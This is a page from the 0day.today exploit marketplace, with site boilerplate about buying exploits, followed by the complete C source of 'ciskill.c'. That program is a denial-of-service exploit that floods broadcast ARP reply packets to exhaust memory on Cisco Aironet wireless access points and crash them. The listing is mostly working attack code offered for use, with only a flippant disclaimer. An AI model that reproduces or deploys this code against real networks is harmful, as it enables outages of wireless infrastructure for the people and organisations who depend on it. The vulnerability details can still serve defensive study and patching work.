0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Cisco Aironet Wireless Access Points Memory Exhaustion ARP Attack DoS
===================================================================== Cisco Aironet Wireless Access Points Memory Exhaustion ARP Attack DoS ===================================================================== // // Cisco Killer - ciskill.c // // Usage: ./ciskill [device] // // Author: Pasv (pasvninja [at] gmail.com) // // Credit: This exploit takes advantage of a vulnerability that was // discovered by Eric Smith on January 12, 2006 (bid:16217) // // Greets to NW, zimmy, GSO, and the rest. // // Description: The vulnerability exists in the way the affected versions // below handle ARP replies, if enough specially crafted ARP packets are sent // on the network with the affected systems it will cause the access point memory // exhaustion which will in a few seconds (depending on the speed of the attacker // and the memory of the target) crash the system, making all ingoing/outgoing // traffic stopped. // // Disclaimer: I pity the foo who uses this exploit for evil, I take no responsibility // for your actions (like a knife maker). // // Versions affected: // Cisco Aironet 350 IOS // Cisco Aironet 1400 // Cisco Aironet 1300 // Cisco Aironet 1240AG // Cisco Aironet 1230AG // Cisco Aironet 1200 // Cisco Aironet 1130AG // Cisco Aironet 1100 // (this includes most linksys wireless access points) #include <stdio.h> #include <unistd.h> #include <sys/socket.h> #include <net/if.h> #include <netinet/in.h> #include <linux/if_ether.h> #include <linux/sockios.h> // Edit this packet accordingly if the target is picky char pkt[]= // Ethernet header "\xff\xff\xff\xff\xff\xff" // Destination: broadcast "AAAAAA" // Source: 41:41:41:41:41:41 "\x08\x06" // Pkt type: ARP // ARP header "\x00\x01" // Hardware type: Ethernet "\x08\x00" // Protocol: IP "\x06" // Hardware size: 6 "\x04" // Protocol size: 4 "\x00\x02" // Opcode: Reply "AAAAAA" // Sender (Mac): 41:41:41:41:41:41 "AAAA" // Sender (IP): 65.65.65.65 "AAAAAA" // Target (mac): 41:41:41:41:41:41 "AAAA" // Target (IP): 65.65.65.65 ; // End of Packet int main(int argc, char **argv) { FILE *fp; int sock, seed; long count; char *device; in_addr_t addr; struct sockaddr sin; printf("CisKill -- Aironet Cisco Killer\nCoded by: Pasv\nDiscovery credit: Eric Smith\n"); if(getuid()) { printf("Must be root to inject arp packets!\n"); exit(1); } if(argc != 2) { strcpy(device,"wlan0"); } else { device=argv[1]; } fp = fopen("/dev/urandom", "r"); fscanf(fp,"%d", &seed); fclose(fp); srand(seed); memset(&sin, 0, sizeof(sin)); sin.sa_family = AF_UNSPEC; strncpy(sin.sa_data,device, 14); sock = socket(PF_INET, SOCK_PACKET, 0x300); printf("Using device: %s\n\n", device); // stupid printf("Press ctrl+c immediately if you wish to stop\nGoing in 5\n"); sleep(1);printf(" 4\n");sleep(1);printf(" 3\n");sleep(1);printf(" 2\n");sleep(1);printf(" 1!\n");sleep(1); while(1) { addr = (rand()%0xff)+(rand()%0xff)+(rand()%0xff)+(rand()%0xff); pkt[28] = (char)addr; pkt[38] = (char)addr; count++; printf("#:%ld bytes sent: %d (should be 42)\n",count, sendto(sock, pkt, 42, 0, (struct sockaddr *)&sin, sizeof(sin))); } } # 0day.today [2024-11-16] #